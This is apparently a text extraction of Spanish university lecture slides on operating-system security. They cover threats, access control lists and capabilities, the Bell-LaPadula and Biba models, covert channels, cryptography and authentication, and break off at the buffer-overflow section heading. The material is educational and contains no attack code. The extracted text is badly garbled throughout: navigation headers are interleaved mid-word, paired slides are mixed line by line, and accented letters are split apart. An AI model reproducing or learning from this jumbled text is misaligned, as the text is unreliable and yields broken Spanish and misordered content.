Seguridad en Sistemas Operativos ´Indice I ´Indice II Introducción
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos Control de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques desde
Control
dentro
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
´Indice I
1
2
Seguridad en Sistemas Operativos
3
Gustavo Romero L´
opez
4
Arquitectura y Tecnolog´ıa de Computadores
18 de diciembre de 2014
5
6
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Introducci´
on
Entorno de seguridad
Amenazas
Atacantes
Seguridad en sistemas operativos
¿Podemos construir sistemas seguros?
Base inform´atica de confianza
Control de acceso a recursos
Dominios de protecci´
on
Listas de Control de Acceso
Capacidades
Modelos formales de seguridad
Seguridad multinivel
Bases de la criptograf´ıa
Criptograf´ıa sim´etrica o de clave secreta
Criptograf´ıa asim´etrica o de clave p´
ublica
1 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
2 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos Control de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques desde
Control
dentro
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
´Indice II
´Indice III
Funciones unidireccionales
Firma digital
M´odulo de plataforma de confianza
7
Autenticaci´
on
Autenticaci´
on mediante objeto f´ısicos
Autenticaci´
on biom´etrica
8
Software de explotaci´
on
Ataques de desbordamiento de b´
ufer
Ataques de cadena de formato
Punteros colgados (dangling pointers)
Ataques de desreferencia de punteros nulos
Ataques de desbordamiento de enteros
Ataques inyecci´on de ´
ordenes
Ataques comprobaci´
on/uso (Time of Check to Time of Use
Attacks)
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
3 / 91
9
Ataques desde dentro
10
Software malicioso
Troyanos
Virus
Gusanos
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
4 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos Control de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques desde
Control
dentro
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Definici´on
Definici´on de seguridad inform´atica:
Protecci´on de la infraestructura computacional
y todo lo relacionado con esta y, especialmente,
la informaci´
on contenida o circulante.
Un conjunto de m´etodos y herramientas
destinados a proteger la informaci´on y por ende,
los sistemas inform´aticos ante cualquier
amenaza.
Introducci´on
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
5 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
6 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos Control de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques desde
Control
dentro
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Evoluci´on del problema
Terminolog´ıa b´asica
vulnerabilidad: fallo de seguridad.
exploit: m´etodo para explotar una
vulnerabilidad. Puede lanzarse manual o
autom´aticamente mediante virus o gusanos.
virus: exploit que requiere la interacci´on del
usuario para propagarse.
gusano: exploit capaz de propagarse
aut´onomamente.
troyano: enga˜no capaz de esconder un exploit.
Grandes cambios a lo largo de la
historia de la Inform´atica:
multiusuario → monousuario
balance precio: sistema / usuario
sistemas aislados → conectados
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
7 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
8 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Amenazas
Control Atacantes
de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Amenazas
desde
Control
dentro
Atacantes
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Seguridad y protecci´on
Seguridad: medida de la
confianza en el sistema y la
informaci´on que contiene.
Protecci´
on: mecanismos que
sirven para garantizar la seguridad.
Entorno de seguridad
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
9 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
10 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Amenazas
Control Atacantes
de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Amenazas
desde
Control
dentro
Atacantes
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Amenazas
Ejemplos de amenazas
CIA: Confidenciality, Integrity and Availability.
Confidencialidad: los datos secretos deben seguir
si´endolo.
Integridad: las personas sin autorizaci´on no deben ser
capaces de alterar los datos.
Disponibilidad: nada debe perturbar la usabilidad del
sistema.
objetivo
confidencialidad
integridad
disponibilidad
Ataques:
An´alisis de tr´afico de datos no cifrados por una red.
Alteraci´on de bases de datos.
Ataques de denegaci´on de servicio: LOIC, botnets.
An´alisis de sistemas para detectar vulnerabilidades: nmap,
metasploit.
Explotaci´on de vulnerabilidades: crimen, guerra (Stuxnet).
amenaza
exposici´on de datos
alteraci´on de datos
denegaci´on de servicio
Terminolog´ıa:
bot o zombi: ordenador bajo control de un atacante.
botnet: conjunto de ordenadores comprometidos.
portscan: detecci´on de servicios en puertos.
En la actualidad cada una se subdividen en varias como, por
ejemplo, la privacidad.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
11 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
12 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Amenazas
Control Atacantes
de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
¿Podemos
desde
Control
dentro
construir
de acceso
Software
sistemas
a recursos
malicioso
seguros?
Modelos
Base
formales
inform´
ade
ticaseguridad
de confianza
Bases de
Atacantes
Los atacantes pueden ser de muy
distintos niveles, desde gente
aburrida a gobiernos.
El objetivo del ataque puede ser
muy diverso: robo, activismo,
vandalismo, terrorismo, guerra,
espionaje, spam, extorsi´on,
fraude,...
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Seguridad en sistemas operativos
13 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
14 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
¿Podemos
Controlconstruir
de acceso
sistemas
a recursos
seguros?
Modelos
Base
formales
inform´
ade
ticaseguridad
de confianza
Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
¿Podemos
desde
Control
dentro
construir
de acceso
Software
sistemas
a recursos
malicioso
seguros?
Modelos
Base
formales
inform´
ade
ticaseguridad
de confianza
Bases de
Seguridad en sistemas operativos
Seguridad en sistemas operativos
M´etodos para comprometer la seguridad:
Sencillos:
Claves demasiado sencillas: PIN “0000”, “1234” o claves
tipo “clave”, “password”, “12345”.
Dejar la clave a la vista: cl´asico postit pegado al monitor.
Descuido con m´edios de almacenamiento: usb perdido,
tirar un ordenador viejo.
Sofisticados:
Ataques Web.
Ataques a bases de datos SQL.
Ataque al sistema operativo: los m´as peligrosos.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Tipos de ataques:
Pasivos: robar informaci´on, capturar informaci´on de la
red,...
Activos: tomar control de un programa para que ejecute
c´odigo malicioso.
Terminolog´ıa:
criptograf´ıa: alterar informaci´on para dificultar la
recuperaci´on del original: comunicaciones, claves, ficheros.
endurecimiento (“hardening”): incorporaci´on de
medidas de seguridad: ASLR, NX bit, SELinux.
15 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
16 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
¿Podemos
Controlconstruir
de acceso
sistemas
a recursos
seguros?
Modelos
Base
formales
inform´
ade
ticaseguridad
de confianza
Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
¿Podemos
desde
Control
dentro
construir
de acceso
Software
sistemas
a recursos
malicioso
seguros?
Modelos
Base
formales
inform´
ade
ticaseguridad
de confianza
Bases de
¿Podemos construir sistemas seguros?
Base inform´atica de confianza
Trusted Computing Base (TCB)
Dado que leemos sobre ataques es normal preguntarse...
¿Es posible construir sistemas seguros? → si
Si lo es, ¿por qu´e no se hace?
→ e
Suele hablarse de sistemas de confianza (“trusted
systems”) en lugar de sistemas seguros.
Todo sistema de confianza se basa en una TCB.
El TCB garantiza el cumplimiento de los requisitos de
seguridad.
Partes de una TCB:
¿Es posible construir sistemas seguros?
En teor´ıa, si.
La dificultad crece exponencialmente con el tama˜no del
software.
Verificaci´on formal de sistemas.
Hardware: casi todo excepto dispositivos de E/S.
Software: sistema operativo, programas privilegiados y otros.
¿Por qu´e no se hace?
La u´nica forma de conseguirlo es mantener la simplicidad.
Las caracter´ısticas son el enemigo de la seguridad.
Ejemplos: email, httpd.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Se intenza minimizar el tama˜no del TCB para facilitar
auditor´ıa y minimizar el riesgo de fallos.
17 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
18 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Dominios
Control
dede
protecci´
accesoona recursos
Listas de Modelos
Control de
formales
Accesode Capacidades
seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Dominios
desde
Control
dentro
dede
protecci´
acceso
Software
ona recursos
Listas
malicioso
de Modelos
Control de
formales
Accesode Capacidades
seguridad Bases de
Control de acceso a recursos
Control de acceso a recursos
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
¿Qu´e se debe proteger?
¿Qu´e se permite a cada qui´en?
19 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
20 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Dominios
Control
dede
protecci´
accesoona recursos
Listas de Modelos
Control de
formales
Accesode Capacidades
seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Dominios
desde
Control
dentro
dede
protecci´
acceso
Software
ona recursos
Listas
malicioso
de Modelos
Control de
formales
Accesode Capacidades
seguridad Bases de
Dominios de protecci´on
Dominios de protecci´on
Objeto: cada uno de los recursos a proteger.
Tipos:
Dominio: par <objeto, derechos>.
Principe of Least Authority (POLA): m´ınimo
conjunto de recursos y derechos necesarios para
poder funcionar.
UNIX: identificadores de usuario y grupo
(UID/GID)
hardware: CPU, memoria, E/S,...
software: procesos, ficheros, bases de datos, sem´aforos,...
Caracter´ısticas:
identificador u
´nico: ej: fichero.
conjunto de operaciones: ej: leer/escribir.
Sujetos/Directores (subjects/principals):
Nombre de los usuarios en el campo de la
seguridad.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Cada par UID/GID da acceso a un dominio de protecci´on.
Se consigue al acceder desde el fichero password.
Cambio de dominio: kernel, setuid()/setgid().
21 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
22 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Dominios
Control
dede
protecci´
accesoona recursos
Listas de Modelos
Control de
formales
Accesode Capacidades
seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Dominios
desde
Control
dentro
dede
protecci´
acceso
Software
ona recursos
Listas
malicioso
de Modelos
Control de
formales
Accesode Capacidades
seguridad Bases de
Dominios de protecci´on
Dominios de protecci´on
Implementaci´
on como una tabla: demasiado grande y dispersa.
Implementaci´on:
Almacenamiento por filas o columnas.
Guardar s´olo campos no vac´ıos.
Tipos:
filas: Listas de Control de Acceso (Access Control
Lists - ACL).
columnas: Capacidades (Capabilities).
Dominios como objeto de protecci´
on:
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
23 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
24 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Dominios
Control
dede
protecci´
accesoona recursos
Listas de Modelos
Control de
formales
Accesode Capacidades
seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Dominios
desde
Control
dentro
dede
protecci´
acceso
Software
ona recursos
Listas
malicioso
de Modelos
Control de
formales
Accesode Capacidades
seguridad Bases de
Listas de Control de Acceso
Capacidades
Una capacidad es una lista de objetos y operaciones
permitidas.
Para cada proceso se asocia un lista de capacidades
(capability list o c-list).
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
25 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
26 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Dominios
Control
dede
protecci´
accesoona recursos
Listas de Modelos
Control de
formales
Accesode Capacidades
seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Seguridad
desde
Control
dentro
multinivel
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Capacidades
Protecci´on:
Arquitectura etiquetada: asocia una etiqueta a cada palabra
de memoria s´olo accesible en modo n´
ucleo, IBM AS/400.
c-list dentro del SO: Hydra.
Modelos formales de seguridad
c-list en espacio de usuario: protecci´
on criptogr´afica,
Amoeba.
Caracter´ısticas:
Las capacidades son m´as eficientes concediendo permisos.
Las ACLs son m´as flexibles y potentes en operaciones sobre
capacidades y listas, especialmente revocaciones.
Ejemplos:
UNIX: ACLs.
L4 y Android: capacidades.
FreBSD: ACLs y capacidades (Capsisum).
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
27 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
28 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Seguridad
Controlmultinivel
de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Seguridad
desde
Control
dentro
multinivel
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Modelos formales de seguridad
Seguridad multinivel
Seguridad b´asica:
Las matrices de protecci´on no son est´
aticas.
Operaciones primitivas (Harrison, 1976):
Quien puede leer y escribir un fichero.
Control de acceso discrecional.
M´ınimo mecanismo de seguridad implementado por la mayor´ıa
de los SO.
crear objeto.
borrar objeto.
crear dominio.
borrar dominio.
a˜
nadir derecho.
eliminar derecho.
Seguridad avanzada:
Requerida por militares, empresas, sanidad y gobiernos.
Control de acceso obligatorio (Mandatory Access Control MAC).
Las primitivas se combinan en ´
ordenes de protecci´
on.
La matriz de protecci´on puede dividirse en dos estados
autorizados y no autorizados.
Asegura que las pol´ıticas de seguridad se cumplen.
Regula el flujo de informaci´
on.
Demostrar si un sistema es seguro es imposible.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Linux: SELinux.
29 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
30 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Seguridad
Controlmultinivel
de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Seguridad
desde
Control
dentro
multinivel
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Modelo Bell-LaPadula
Modelo Bell-LaPadula
Bell and LaPadula, 1973
Bell and LaPadula, 1973
Seguridad militar.
Objetivo: mantener secretos.
Niveles de seguridad: no clasificado, confidencial, secreto
y alto secreto.
Un general puede tener acceso a tipo de documentos y un
teniente como m´aximo a los confidenciales.
Reglas de flujo de informaci´on:
Propiedad de seguridad simple: un proceso de nivel k s´
olo
puede leer documentos de su nivel e inferiores.
Propiedad *: un proceso de nivel k s´
olo puede escribir
documentos de su nivel y superiores.
Resumiendo: read down, write up.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
31 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
32 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Seguridad
Controlmultinivel
de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Seguridad
desde
Control
dentro
multinivel
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Modelo Biba
Canales encubiertos
covert channels
Los modelos formales no funcionan.
Detener el goteo de informaci´on es matem´aticamente
imposible (Lampson, 1973).
Modelo de Lampson:
Seguridad empresarial.
Objetivo: garantizar la integridad de la
informaci´on.
Reglas de flujo de informaci´on:
El problema del confinamiento.
Los canales encubiertos.
Propiedad de integridad simple: un proceso de nivel k s´
olo
puede escribir documentos de su nivel e inferiores.
Propiedad de integridad *: un proceso de nivel k s´
olo puede
leer documentos de su nivel y superiores.
Algunas organizaciones requieren ambos
modelos a la vez pero es dif´ıcil conseguirlo.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
33 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
34 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Seguridad
Controlmultinivel
de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Seguridad
desde
Control
dentro
multinivel
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Canales encubiertos
Esteganograf´ıa
covert channels
Otra forma de canal encubierto.
Esconder informaci´on en un imagen.
Usos l´ıcitos: marcas de agua.
Canales encubiertos:
Modulaci´
on del uso de la CPU.
Adquisici´
on y liberaci´
on de un recurso.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
35 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
36 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Criptograf´
Control
ıa de
sim´
acceso
etrica oa de
recursos
clave secreta
ModelosCriptograf´
formales ıa
deasim´
seguridad
etrica o Bases
de clave
Introducci´
de p´
laublica
criptograf´
on Entorno
Funciones
ıa Autenticaci´
deunidireccionales
seguridad
on Software
Seguridad
Firma
deendigital
explotaci´
sistemas
M´
oonoperativos
dulo
Ataques
de Criptograf´
plataforma
desde
Control
dentro
ıade
de
sim´
confianza
acceso
etrica
Software
oa de
recursos
malicioso
clave secreta
ModelosCriptograf´
formales ıa
deasim´
seguridad
etrica o Bases
de clave
de
Criptograf´ıa
Criptograf´ıa: del griego “krypto”, oculto, y “graphos”,
escritura.
Desempe˜
na hoy d´ıa un papel central en seguridad.
Bases de la criptograf´ıa
La criptograf´ıa moderna es muy sofisticada.
Usos: sistemas de ficheros, comunicaciones, identificaci´
on,...
Prop´
osito: tomar un mensaje, (mensaje en en claro), y
convertirlo en inteligible (mensaje cifrado) de tal forma que
s´
olo las personas autorizadas puedan recuperar el original.
Los algoritmos deben ser p´
ublicos frente a la seguridad por
oscuridad.
Principio de Kerchoff: la seguridad depende de la clave.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
37 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
38 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Criptograf´
Control
ıa de
sim´
acceso
etrica oa de
recursos
clave secreta
ModelosCriptograf´
formales ıa
deasim´
seguridad
etrica o Bases
de clave
Introducci´
de p´
laublica
criptograf´
on Entorno
Funciones
ıa Autenticaci´
deunidireccionales
seguridad
on Software
Seguridad
Firma
deendigital
explotaci´
sistemas
M´
oonoperativos
dulo
Ataques
de Criptograf´
plataforma
desde
Control
dentro
ıade
de
sim´
confianza
acceso
etrica
Software
oa de
recursos
malicioso
clave secreta
ModelosCriptograf´
formales ıa
deasim´
seguridad
etrica o Bases
de clave
de
Criptograf´ıa sim´etrica o de clave secreta
Criptograf´ıa asim´etrica o de clave p´ublica
Sustituci´
on monoalfab´etica: fortaleza 27! ≈ 1,09 × 1028
abcdefghijklmn˜
nopqrstuvwxyz
uthikoavpjqn˜
nxeyzwlmdfgbcrs
¿Qu´e operaci´on es m´as dif´ıcil?
123456789123456789
× 123456789123456789 =⇒ cifrar
√
15241578780673678515622620750190521 =⇒ descifrar
Usa la misma clave para cifrar y descifrar.
Ventajas: eficiente.
Inconvenientes: intercambio de claves.
Ejemplos: DES, 3DES, RC5, AES, Blowfish e IDEA.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Usa dos claves, una para cifrar (p´ublica) y otra para
descifrar (privada).
Ventajas: elimina el problema de la distribuci´on de claves.
Inconvenientes: miles de veces m´as lento que la sim´etrica.
Ejemplos: Diffie-Hellman, RSA, DSA, ElGamal,
Criptograf´ıa de curva el´ıptica, Criptosistema de
Merkle-Hellman, Goldwasser-Micali y
Goldwasser-Micali-Rivest.
39 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
40 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Criptograf´
Control
ıa de
sim´
acceso
etrica oa de
recursos
clave secreta
ModelosCriptograf´
formales ıa
deasim´
seguridad
etrica o Bases
de clave
Introducci´
de p´
laublica
criptograf´
on Entorno
Funciones
ıa Autenticaci´
deunidireccionales
seguridad
on Software
Seguridad
Firma
deendigital
explotaci´
sistemas
M´
oonoperativos
dulo
Ataques
de Criptograf´
plataforma
desde
Control
dentro
ıade
de
sim´
confianza
acceso
etrica
Software
oa de
recursos
malicioso
clave secreta
ModelosCriptograf´
formales ıa
deasim´
seguridad
etrica o Bases
de clave
de
Funciones unidireccionales
Firma digital
A veces es necesario firmar un documento digitalmente para
poder verificar su autenticidad: ´
ordenes bancarias, IRPF,...
Uso: al recibir un documento se aplica...
funci´on hash al documento.
clave p´
ublica a la firma ←→ ¿C´omo obtenerla?
funci´
on hash: funci´on “f (x) = y ” f´acil de
calcular pero que dado f (x) encontrar x sea
imposible o extremadamente costoso.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
41 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
42 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Criptograf´
Control
ıa de
sim´
acceso
etrica oa de
recursos
clave secreta
ModelosCriptograf´
formales ıa
deasim´
seguridad
etrica o Bases
de clave
Introducci´
de p´
laublica
criptograf´
on Entorno
Funciones
ıa Autenticaci´
deunidireccionales
seguridad
on Software
Seguridad
Firma
deendigital
explotaci´
sistemas
M´
oonoperativos
dulo
Ataques
de Criptograf´
plataforma
desde
Control
dentro
ıade
de
sim´
confianza
acceso
etrica
Software
oa de
recursos
malicioso
clave secreta
ModelosCriptograf´
formales ıa
deasim´
seguridad
etrica o Bases
de clave
de
Firma digital
M´odulo de plataforma de confianza
Trusted Platform Module - TPM
Los emisores suelen adjuntar un certificado junto al
mensaje.
Certificado: nombre y clave p´ublica firmado digitalmente.
Autoridad certificadora (Certification Authority - CA):
organizaci´on responsable del mantenimiento de los
certificados y las claves p´ublica.
Infraestructura de clave p´
ublica (Public Key
Infrastructure - PKI): distribuida junto a sistemas
operativos y navegadores.
Ejemplos: MD5 (insegura), SHA-1 (comprometida),
SHA-256, SHA-512, Tiger, WHIRPOOL.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
La criptograf´ıa necesita claves.
Almacenar las claves de forma segura es esencial.
¿Como hacerlo en sistemas que no son seguros?
TPM: chip con memoria no vol´atil capaz de almacenar
claves y realizar operaciones de cifrado, descifrado y
verificaci´on de firmas digitales.
Tema controvertido: ¿qui´en controla el TPM?
Microsoft: software pirata, virus, control de la plataforma.
Industrial audiovisual: control de la pirater´ıa.
Usuario: mi ordenador, mi SO, mis ficheros, mis normas :)
43 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
44 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Autenticaci´
Controlode
n mediante
acceso a objeto
recursosf´ısicos
Modelos
Autenticaci´
formales
onde
biom´
seguridad
etrica Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Autenticaci´
desde
Control
dentro
ode
n mediante
acceso
Software
a objeto
recursos
malicioso
f´ısicos
Modelos
Autenticaci´
formales
onde
biom´
seguridad
etrica Bases de
Autenticaci´on
Autenticar: verificar la identidad.
Un ordenador seguro requiere la identificaci´on de sus
usuarios.
Los primeros ordenadores no requer´ıan identificarse.
Los tiempos cambian: acceso f´ısico −→ acceso remoto.
La identificaci´on se basa en algo que el usuario...
Autenticaci´on
sabe −→ pin, contrase˜
na, patr´on,...
tiene −→ objeto f´ısico.
es −→ huella dactilar, cara, iris,...
El m´etodo m´as utilizado es teclear un nombre de usuario y
una contrase˜na.
Two Factor Authentication (TFA): identificaci´on
mediante dos m´etodos.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
45 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
46 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Autenticaci´
Controlode
n mediante
acceso a objeto
recursosf´ısicos
Modelos
Autenticaci´
formales
onde
biom´
seguridad
etrica Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Autenticaci´
desde
Control
dentro
ode
n mediante
acceso
Software
a objeto
recursos
malicioso
f´ısicos
Modelos
Autenticaci´
formales
onde
biom´
seguridad
etrica Bases de
Claves d´ebiles
Seguridad de las claves en UNIX
Ataque de fuerza bruta: probar claves.
Un 86 % de las claves son vulnerables (Morris y
Thompson, 1979).
LinkedIn Hack (2012):
Claves en un fichero protegido en disco.
Evoluci´on del fichero de claves:
claves en claro.
claves codificadas.
claves codificadas con sal y divisi´
on de ficheros.
robo de 6.46M claves
top 10: link, 1234, work, god, job, 12345, angel, the, ilove, sex.
Vulnerable a un ataque de fuerza bruta si un
atacante consigue el fichero.
Contramedidas: sal y comprobaci´on indirecta.
IOActive (2013): la mayor´ıa de los usuarios deja
la clave por defecto.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
47 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
48 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Autenticaci´
Controlode
n mediante
acceso a objeto
recursosf´ısicos
Modelos
Autenticaci´
formales
onde
biom´
seguridad
etrica Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Autenticaci´
desde
Control
dentro
ode
n mediante
acceso
Software
a objeto
recursos
malicioso
f´ısicos
Modelos
Autenticaci´
formales
onde
biom´
seguridad
etrica Bases de
Contrase˜nas de un s´olo uso
Autenticaci´on Desaf´ıo-Respuesta
One Time Password (OTP)
El usuario proporciona una lista de preguntas
y respuestas.
A identificarse se escoge una al azar.
Muchos tipos: tarjetas inteligentes o no, usb,
tel´efono m´ovil.
La base de datos debe protegerse al igual que
las contrase˜nas.
Se aconseja cambiar las claves con frecuencia :)
Las claves de un s´olo uso son el caso extremo.
Si alguien la descubre no importa porque la
siguiente vez ser´a otra.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Challenge-Response Authentication
49 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
50 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Autenticaci´
Controlode
n mediante
acceso a objeto
recursosf´ısicos
Modelos
Autenticaci´
formales
onde
biom´
seguridad
etrica Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Autenticaci´
desde
Control
dentro
ode
n mediante
acceso
Software
a objeto
recursos
malicioso
f´ısicos
Modelos
Autenticaci´
formales
onde
biom´
seguridad
etrica Bases de
Autenticaci´on mediante objeto f´ısicos
Autenticaci´on biom´etrica
Identificaci´on mediante alguna de las
caracter´ısticas f´ısicas del usuario
Dos partes: registro e identificaci´on.
El segundo m´etodo m´as utilizado es la
identificaci´on mediante un objeto f´ısico.
Normalmente se requiere introducir adem´as una
contrase˜na o pin, ej: ATM.
Probar google-authenticator: OTP + TFA.
registro: medici´on, digitalizaci´on y almacenamiento.
identificaci´on: proporcionar nombre de usuario.
La caracter´ıstica elegida debe tener unas
propiedades adecuadas:
facilidad de medici´on
variabilidad entre individuos
mantenimiento en el tiempo
Ejemplos: huella, voz, longitud de los dedos, iris,
cara, firma, forma de teclear, patr´on infrarrojo,...
Problema: suplantaci´on de identidad, ej: cara.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
51 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
52 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
